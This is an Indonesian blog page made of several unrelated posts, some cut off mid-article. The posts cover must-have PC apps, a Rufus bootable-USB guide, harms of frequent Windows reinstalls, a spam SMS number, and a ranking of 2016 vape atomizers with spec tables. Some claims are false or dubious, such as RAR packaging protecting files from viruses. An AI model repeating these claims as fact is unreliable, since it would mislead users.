Menurut kami aplikasi yang satu ini wajib ada untuk mendukung kegiatan browsing. Google Chrome merupakan aplikasi browsing terbaik saat ini. Tampilannya yang simple dan performa yang tidak lelet menjadi salah satu alasan kenapa browser ini menjadi yang terbaik.

Mozila Firefox
Biasanya kami hanya menggunakan dua browser ini karena saling melengkapi. Performa Mozila sedikit agak lemot dibandingkan Google Chrome.

Internet Download Manager
Aplikasi ini menurut kami wajib di install pada komputer dan laptop. Adanya IDM akan membantu kita ketika proses download. Download dengan menggunakan IDM akan lebih cepat dan yang paling penting kecepatan download bisa dibatasi sehingga tidak menghabiskan seluruh bandwith.

Adobe Acrobat Reader
Aplikasi yang satu ini dibutuhkan untuk membuka file berformat pdf. Jika kita berada dalam sebuah lembaga pendidikan, misalnya sekolah dan kampus maka nanti akan menemui banyak file-file pdf ini. Oleh karena itu kami rasa aplikasi ini sangat dibutuhkan.

Microsoft Office
Tentunya aplikasi ini wajib ada pada komputer dan laptop. Aplikasi ini dapat membantu mengolah data, angka, grafik dan lainnya. Siswa, mahasiswa dan orang kantoran biasanya sehari-harinya akan membutuhkan aplikasi ini untuk menyelesaikan pekerjaan.

WinRAR
Menurut kami aplikasi ini juga sangat penting keberadaanya. Ketika mendownload software atau file di internet kita akan banyak menemui bahwa software dan file tersebut dikemas dalam format RAR. Tujaunnya adalah agar software dan file lebih aman terhadap serangan virus.

VLC Media Player
Aplikasi pemutar video yang satu ini wajib ada pada komputer dan laptop. Banyak keunggulan yang dimiliki oleh aplikasi ini dan bug nya juga lebih sedikit dibandingkan aplikasi pemutar video lainnya. Biasanya dalam sistem operasi windows sudah ada aplikasi bawaan pemutar video, hanya saja tidak semua format video bisa diputar dengan aplikasi video bawaan Windows ini.

CCleaner
Aplikasi ini digunakan untuk membersihkan file-file sampah pada komputer dan laptop. Aplikasi ini sangat membantu agar performa komputer dan laptop lebih maksimal.

Itulah beberapa aplikasi yang wajib ada pada komputer dan laptop. Sedangkan untuk aplikasi yang lainnya kami rasa menyesuaikan dengan kebutuhan. Aplikasi di atas merupakan aplikasi yang sangat dianjurkan dan wajib di install pada komputer dan laptop.

Jika ada tambahan mengenai aplikasi yang wajib di install pada komputer dan laptop, silahkan tuliskan pada kolom komentar di bawah. Berikan dan bagikan pendapatmu pada kolom komentar di bawah, ditunggu ya!
Saat ini rata-rata orang sudah menggunakan flashdisk sebagai media penginstalan. Penggunaan CD/DVD sebagai media penginstalan lama kelamaan akan hilang. Hal ini sangat wajar terjadi, karena dengan menggunakan flashdisk, proses install ulang sistem operasi berjalan dengan lebih cepat. Dengan menggunakan flashdisk juga akan lebih efisien karena akan menghemat waktu. Terakhir kami menginstal ulang menggunakan CD/DVD sudah 3 tahun yang lalu. Ketika melihat teman menginstal ulang dengan menggunakan flashdisk, kami melihat ada proses yang lebih cepat ketika melakukan install ulang. Tidak percaya disitu saja, kami langsung melakukan uji coba menginstal ulang dengan menggunakan flashdisk. Hasilnya memang sangat terasa sekali bedanya. Apakah flashdisk untuk instal ulang dibuat khusus? Tidak, sama saja dengan flashdisk kebanyakan. Sewaktu-waktu flashdisk bisa dijadikan sebagai media install ulang dan sewaktu-waktu juga bisa digunakan untuk keperluan menyimpan data lainnya.

Bagi kamu yang masih menggunakan netbook, tentunya akan dipusingkan ketika hendak melakukan install ulang. Solusinya adalah dengan melakukan install ulang menggunakan flashdisk. Jika menggunakan CD/DVD, tentunya kamu harus membeli DVD-ROM eksternal terlebih dahulu dan cara ini tidak efisien karena akan menghabiskan uang.

Untuk membuat bootable USB Windows ada banyak cara yang bisa dilakukan. Nah, kali ini kita akan membuat bootable USB Windows dengan menggunakan aplikasi Rufus. Kenapa menggunakan Rufus? Karena aplikasi yang satu ini sangat simple dan ringan. Cara penggunaan yang simple dan mudah dipahami menjadi alasan bagi kami untuk menggunakannya.

Cara Membuat Bootable USB Windows Menggunakan Rufus

Yang harus dipersiapkan


  1. File ISO Windows versi berapa saja sesuai dengan kebutuhan. Kamu bisa mendapatkan file ISO dengan cara mendownloadnya langsung dihalaman resmi Microsoft untuk lebih lengkapnya baca artikel cara download file ISO Windows dari halaman resmi Microsoft.
  2. Flashdisk minimal berkapasitas 4GB.
  3. Aplikasi Rufus.

Langkah-langkah membuat bootable USB Windows


1. Colokkan flashdisk ke Port USB pada laptop atau PC.

2. Selanjutnya buka aplikasi Rufus yang telah di download. Pastikan flashdisk telah terbaca oleh Rufus. Perhatikan bagian Device akan ada nama dan kapasitas flashdisk anda.
Cara Membuat Bootable USB Windows Menggunakan Rufus
Baca selengkapnya �
Ketika sistem operasi yang digunakan mengalami masalah atau terjadi error, maka saat itu juga kita dituntut dapat mengatasinya agar hal yang buruk tidak terjadi pada komputer. Ada beberapa cara untuk mengatasi masalah yang terjadi pada komputer, biasanya seseorang akan terlebih dahulu browsing mengenai bagaimana cara mengatasi masalah pada komputer. Selanjutnya menanyakan pada teman yang mengerti mengenai hal ini, kemudian membawa komputer ke tempat service yang terpercaya. Nah, solusi terakhir yang paling mudah dan ampuh adalah dengan menginstal ulang sistem operasinya. Dengan melakukan hal ini, komputer akan kembali seperti semula dan terasa ringan seperti halnya sebuah komputer baru.

Kami juga menyadari bahwa cara ini mudah dan ampuh, namun sebaiknya jangan terlalu sering menginstal ulang sistem operasi komputer. Jangan kamu mengira bahwa jika terlalu sering menginstal sistem operasi merupakan hal yang bagus. Faktanya adalah sebaliknya, terlalu sering menginstal sistem operasi malah akan menimbulkan dampak negatif.

Mengatasi masalah dengan cara menginstal ulang sebenarnya tidak salah. Kamu bisa melakukan ini jika sudah tidak ada cara lain untuk mengatasi masalah pada komputer. Alangkah baiknya jika kamu mencoba cara lain sambil belajar juga. Jika kamu menemukan solusi, maka kamu dapat berbagi ketika teman juga mengalami masalah yang sama.

Inilah yang Akan Terjadi Jika Komputer Terlalu Sering di Install Ulang

Hal yang Akan Terjadi Jika Komputer Terlalu Sering di Install Ulang


Membuat Hard Disk Cepat Rusak
Jika komputer telalu sering di install ulang, biasanya yang akan rusak duluan adalah hard disk. Karena pada proses install ulang , hard disk akan bekerja dengan ekstra keras untuk melakukan proses read dan write.

Membuang Banyak Waktu dan Uang
Benar sekali jika menginstal ulang merupakan cara yang mudah dan ampuh untuk mengatasi masalah pada komputer. Semua masalah akan teratasi dengan melakukan install ulang, mulai dari error, virus yang menyebar dan masalah lain. Namun cara ini tidak begitu efisien karena akan membuang banyak waktu dan uang.

Proses install sistem operasi setidaknya akan membutuhkan waktu 1 - 2 jam hingga benar-benar selesai dan siap untuk digunakan. Jika kamu tidak bisa menginstal ulang sendiri tentunya akan membawanya ke tempat servis dan jika telah selesai di instal kamu harus membayar.

Setelah kamu membaca artikel ini, setidaknya kamu akan mengerti jika menignstal ulang bukan cara yang efisien untuk mengatasi masalah. Kami mengharapkan jangan terlalu sering menginstal ulang, sebaiknya kamu mencari cara lain untuk permasalahan pada komputer.

Ada tambahan? Silahkan tuliskan pada kolom komentar di bawah.

Minggu, 23 April 2017

Excation.info, Sudah lama saya bertanya-tanya tentang "Apa itu kedewasaan?" mulai dari memperhatikan perbuatan orang berumur 17+ zaman sekarang sampai bayi-pun saya perhatikan demi mendapatkan jawaban tersebut.

Banyak kasus di dalam kalangan masyarakat yang orang yang sudah berumur 17+ keatas masih mempunyai tindakan kekanak-kanakan mulai dari keputusan yang ia ambil sampai karakternya saya nilai, akhirnya saya mendapatkan kesimpulan.

KESIMPULAN :
"Karakter dan umur seseorang tidak dapat menjadikan penilaian dari kedewasaan seseorang tetapi kedewasaan seseorang di nilai dari cara ia membuat keputusan yang menggunakan akal(ilmu) daripada menggunakan HATI-nya".

Karakter seseorang yang konyol dan seperti kekanak-kanakan tidak dapat dijadikan nilai ukur kedewasaan karena bisa di kategorikan HUMOR(HUMORIS) dan kadang seseorang yang berbuat konyol dan seperti anak-anak tersebut dibuat/dilakukan untuk tujuan menghibur seseorang dan apabila ia sukses menghibur maka ia melakukannya secara profesional, contohnya bisa kita lihat di televisi "bagaimana seorang pelawak sukses menghibur hati penonton dengan profesional".

Demikian artikel ini ditulis oleh : Riyan Hidayat, apabila terdapat kesalaham mohon untuk meninggalkan komentar di bawah kolom ini, terima kasih.
TRANS7 :73 77 F9 E3 09 CB 4D 21

excation.blogspot.com, Pengguna seluler kembali di hebohkan dengan SMS tak dikenal dan tidak dikenal pula pemiliknya.

Pada hari sabtu ini 22 April 2017 saya terkejut ada yang meng-SMS saya dengan kata "Jangan diam aja dong,tlp saya kesini 08091401070,aq tau diam itu emas, tapi suara kamu tuh berlian (No SEX n SARA)".

Menurut hasil searching saya dari mesin telusur; SMS tersebut dikirim secara acak dan tidak hanya kita yang menerima SMS tersebut, banyak pengguna seluler lain yang merasa terganggu karena SMS tersebut datang terus menerus dan ada juga yang bilang ketika di telepon maka ada wanita yang ngangkat, saya masih tidak paham apa alasan dari SMS SPAM ini tapi yang jelas SMS ini menggangu dan dapat menimbulkan kesalahpahaman bagi orang yang sudah berkeluarga.

PERHATIAN !
Untuk SPAM PANGGILAN Perhatikan jam pelaku menelpon ke nomor anda, kalau saya di telepon hampir setiap jam 8.52 pagi dan saya sarankan anda untuk tidak menelpon nomor tersebut karena pulsa anda akan berkurang drastis.


Refferensi : https://id.shouldianswer.net/nomor-telepon/08091401070

Sabtu, 22 April 2017

RDA Vape Terbaik 2016

Di tulisan sebelumnya sempat kami publikasikan tulisan tentang rda terbaik untuk flavor, bagi vapers yang belum sempat membaca sangat di sarankan menyimak dulu di 5 RDA Terbaik untuk Flavor. Ok, langsung saja ini dia deretan rda vape terbaik 2016 indonesia versi vapeku.

10 RDA Vape Terbaik 2016


#1 RDA Goon 22 by Custom Vape

Vapers mana yang tidak kenal dengan RDA yang sejak rilis tahun 2016 lalu hingga sekarang selalu menjadi primadona, pun untuk versi clonenya. RDA Goon benar-benar mencuri perhatian banyak kalangan vapers, selain keunggulan performa dari segi cloud dan flavor namun RDA ini juga unggul dari segi materialnya sehingga pasarannya masih tetap bagus hingga saat ini. 
RDA Goon 22 Warna SS
RDA Goon 22 Warna SS
 
Goon Rda cukup variatif karena merilis dengan 2 ukuran yakni Goon 22m dan Goon 24m. Customvapes juga merilis versi low profilenya atau sering di sebut RDA Goon LP, memiliki ukuran yang sedikit lebih pendek dari versi defaultnya. Namun sepertinya tidak terlalu booming seperti pendahulunya. Berikut detil spesifikasi dari RDA Goon 22 dari 528 customvape

Nama Keterangan
Merk 528 Custom Vape(528custom.com)
Model Goon RDA
Tipe Atty RDA
Warna Black, Silver, Gold
Material Stainless Steel 304
Diameter 22 mm
Deck Velo Deck
Air Hole Yes, 6 air hole atas
Post Dual Post
Konektor 510 gold plated pin konektor
Paket Pembelian 1 x Goon RDA, 1 x driptip, 1 x widebore, 1 x goon bag, sil dan sekrup cadangan
Baca juga : Review RDA Goon authentic

#2 RDA Tugboat Slamcap by Flawless

RDA vape terbaik selanjutnya adalah Tugboat Slamcap RDA. Tugboat Slamcap RDA atau sering kita sebut RDA Slamcap ini merupakan produk atomizer RDA dari Flawless USA. RDA Slamcap ini sejatinya meneruskan Tuvboat V2 RDA yang kala itu kurang mendapatkan respon dari vaper antusias. Benar saja selepas rilisnya RDA Slamcap ini mampu menambal kekurangan dari Tugboat V2 dan perlahan namun pasti menjadi salah satu RDA Flavour terbaik 2016 silam.

Tugboat Slamcap RDA
RDA Tugboat Slamcap | Img : IG @vapeon_yk

Memiliki ukuran 22 mili dengan desain mini (mirip maze 22 hcigar) dengan 3 terminal post dan 3 air hole di masing2 sisi chambernya. Berikut detil spesifikasi RDA Tugboat Slamcap dari Flawless.

Spesifikasi RDA Tugboat Slamcap
Nama Keterangan
Merk Flawless(flawlessvapeshop.com)
Model Tugboat Slamcap RDA
Tipe Atty RDA
Warna Black, Silver, Gold
Material Stainless Steel 304
Diameter 22 mm
Deck Velo Deck
Air Hole Yes, 2 air hole bawah
Post Triple Post
Konektor 510 gold plated brass pin konektor
Paket Pembelian 1 x Slamcap RDA, 1 x driptip, sil dan part cadangan, 1 x kunci L

#3 The Recoil RDA by Grimm Green x Ohm Boy

Setali tiga uang dengan RDA Druga dan Skill RDA, the Recoil RDA juga merupakan hasil dari kolaborasi sang master dalam menghasilkan karya. Adalah Grimm Green dan Ohm Boy yang notabennya merupakan master dalam kancah vape dunia, berkat pengalaman dari keduanya maka di rilislah RDA Recoil pada pertengahan tahun 2016 silam.
RDA Recoil
The Recoil RDA dari Grimm Green dan Ohm Boy
 
RDA dengan ukuran 24 mili ini terbilang sangat versatile, namun menurut kami termasuk rda berkarakter cloud chaser dengan kualitas flavour yang di hasilkan sama bagusnya. Kira2 mirip dengan karakter Vgod Pro Drip Rda yang beberapa waktu lalu sudah kami ulas, namun harga RDA ini cenderung sedikit lebih mahal.

Spesifikasi RDA The Recoil
Nama Keterangan
Merk Grimm Green X Ohm Boy
Model Recoil RDA
Tipe Atty RDA
Warna Black, Silver, Gold
Material Stainless Steel 304
Diameter 24 mm
Deck Velo Deck
Air Hole Yes, 2 air hole atas
Post Recoil Post
Konektor 510 gold plated brass pin konektor
Paket Pembelian 1 x Recoil RDA, 1 x driptip, sil dan part cadangan, 1 x pin konektor, 1 x kunci L

#4 RDA Tsunami 22 by Geekvape

Selanjutnya adalah RDA Tsunami dari Geekvape, singkatnya RDA Tsunami ini merupakan rda paling populer tahun 2016 lalu bersama Rda Goon buatan 528 Customvape. Tak hanya produk oten dari RDA Tsunami, namun produk clone Tsunami pun laris manis di pasaran. Hal ini tentunya tak lepas dari performa apik dari atomizer Tsunami yang juga di kenal sangat murah kala itu. Dari sisi desain Tsunami mengadopsi post dari Velocity serta sedikit sentuhan desain air hole RDA Kennedy pada bagian deck bawahnya.
Tsunami RDA 22
RDA Tsunami 22 | Img : 3fvape
Berukuran 22 milimeter dengan chamber yang cukup panjang serta desain top cap yang cembung menandakan RDA Tsunami berkarakter flavor junkies. Menganut desain air hole yakni air hole bawah pada deck sehingga jarak cloud lebih panjang saat menuju mulut, efeknya cloudnya pun lumayan tebal. Untuk lebih jelasnya akan kita sajikan data spesifikasi dari RDA Tsunami Geekvape di bawah ini.

Spesifikasi RDA Tsunami
Nama Keterangan
Merk Geekvape(geekvape.com)
Model Tsunami RDA 22
Tipe Atty RDA
Warna Black, Silver
Material Stainless Steel 304
Diameter 22 mm
Deck Velo Deck
Air Hole Yes, 2 air hole bawah
Post Velocity Post
Konektor 510 gold plated brass pin konektor
Paket Pembelian 1 x Tsunami RDA, 1 x driptip, sil dan part cadangan, 1 x pin SS skuonk konektor, 1 x kunci L

#5 RDA Mutation X V5 by Indulgence

RDA vape terbaik 2016 berikutnya yakni RDA Mutation X V5 dari Indulgence Unicig, sebuah rda pabrikan dari negeri Paman Sam, USA. Mutation X V5 merupakan versi terbaru dari pendahulunya Mutation X V4 yang kabarnya menyebabkan liquid leaking, sehingga di luncurkan lah versi anyarnya untuk menutup celah tersebut. 
Mutation X V5 RDA
RDA Mutation X V5

Secara desain sangat mirip dengan Mutation X V4, berbahan dasar stainless steel 304 dengan chambar cukup panjang (mirip Tsunami RDA). sedikit berbeda dengan Tsunami pada Mutation X V5 mengaopsi 2 air hole yakni ait hole bawah dan 18 air hole lagi di bagian atas. Tentunya kedua air hole ini bisa di seting sesuai kebutuhan, so adjustable! Ok, untuk menyingkat waktu langsung saja kita simak lebih detil spesifikasi dari Mutation X V5 di bawah ini.

Spepsifikasi RDA Mutation X V5
Nama Keterangan
Merk Indulgence(vapeindulgence.com)
Model Mutation X V5 RDA
Tipe Atty RDA
Warna Black, Silver, Blue
Material Stainless Steel 304
Diameter 22 mm
Deck Velo Deck
Air Hole Yes, 2 air hole bawah dan 18 air hole atas
Post Velo post 4 hole
Konektor 510  pin konektor
Paket Pembelian 1 x Mutation X V5 RDA, 1 x resin driptip, sil dan sekrup cadangan, 1 x kunci L

#6 RDA Velocity by Cisco (Avidvaper) & Dino Ferrari

Mungkin vapers pernah mendengar istilah velocity deck dan velocity post yang saat ini banyak di gunakan sebagai standar sebuah rda yang bagus yang hingga sekarang banyak brand mengaplikasikannya. Yup, berawal dari RDA velocity lah semua istilah tersebut yang notabennya merupakan sebuah rda hasil kolaborasi antara Cisco dari Avidvaper dan Dino Ferrari. 
Velocity RDA Authentic
The Velocity RDA Authentic

Menyandang sebagai salah satu RDA paling legendaris tentunya tidak salah jika RDA velocity menjadi salah satu RDA vape terbaik. Namun kabarnya saat ini dikatakan sudah tidak mungkin lagi mendapatkan produk authentic dari Rda Velocity ini, alternatifnya mungkin bisa melirik buatan Tobeco yang sudah terkenal sangat bagus untuk urusan clone rda. Rda Velocity berukuran 22 milimeter berbahan material stainless steel 304 dengan pin 510 berbahan copper, dalam paket pembelian Rda Velocity authentic termasuk driptip dan widebore. Untuk memperjelas berikut data dan spesifikasi RDA Velocity Authentic.

Spesifikasi RDA Velocity Authentic
Nama Keterangan
Merk Avidvaper feat Dino Ferrari
Model Velocity RDA 22
Tipe Atty RDA
Warna Black, Silver
Material Stainless Steel 304
Diameter 22 mm
Deck Velo Deck
Air Hole Yes, 1 air hole bawah dan 2 air hole atas
Post Velo post 4 hole
Konektor 510  pin konektor
Paket Pembelian 1 x Velocity RDA, 1 x delrin driptip, 1x widebore, sil dan sekrup cadangan, 1 x kunci L

#7 RDA Kennedy by Kennedy Enterprise

Spesifikasi RDA Kennedy Authentic
Nama Keterangan
Merk Kennedy Enterprise
Model Kennedy RDA
Tipe Atty RDA
Warna Black, Silver, Blue
Material Stainless Steel 316
Diameter 22 mm
Deck Velo Deck
Air Hole Yes, 2 air hole bawah dan 6 air hole atas
Post Velo post 4 hole
Konektor 510  pin konektor
Paket Pembelian 1 x Kennedy RDA, 1 x resin driptip, sil dan sekrup cadangan, 1 x kunci L

#8 RDA Maze 22 by Hcigar

Nah untuk yang satu ini mungkin sedikit berbeda, jujur saja secara performa dari RDA Maze 22 ini tidak begitu istimewa seperti list diatas namun RDA ini banyak penggunanya. Yup, RDA Maze buatan Hcigar ini termasuk RDA Authentic termurah saat itu. Material dan finishingnya juga tentu saja jempolan, desainnya sedikit berkesan retro dan mungil menjadikan RDA Mze Hcigar laris manis di pasar Indonesia. 
Maze RDA 22
RDA Maze 22 by Hcigar

Sebagai informasi saja RDA Maze 22 ini berkarakter Flavour Chaser. Berukuran 22 mili mengunakan 2 air hole bawah dan air hole atas yang bisa kita atur sesuai kebutuhan menjadikan Maze 22 sangat versatile. Desain post mengadopsi konsep RDA velocity yakni dengan dual post dan 2 hole pada masing-masing sisi postnya. Lebih lengkap tentang RDA garapan Hcigar berikut kami sajikan tabel spesifikasi RDA Maze 22 di bawah ini.

Spesifikasi RDA Maze 22 by Hcigar
Nama Keterangan
Merk Hcigar (augvape.com)
Model Maze RDA 22
Tipe Atty RDA
Warna Black, Silver, Blue
Material Stainless Steel 316
Diameter 22 mm
Deck Velo Deck
Air Hole Yes, 2 air hole bawah dan 6 air hole atas
Post Dual post 4 hole
Konektor 510  pin konektor
Paket Pembelian 1 x Maze RDA, 1 x resin driptip, sil dan sekrup cadangan, 1 x kunci L

Itulah daftar RDA vape terbaik 2016 menurut kami, tentunya daftar rda terbaik diatas kami pertimbangkan dengan beberapa alasan seperti performa, bahan serta desain, dan tentunya dari sisi harganya. Bagaimana, apakah anda pernah menggunakan salah satu dari RDA terbaik diatas? sampaikan pengalaman anda melalui komentar di bawah atau silakan temukan tulisan menarik kami yang lain di bawah ini.

Sumber : http://www.vapeku.net/2017/04/rda-vape-terbaik-2016.html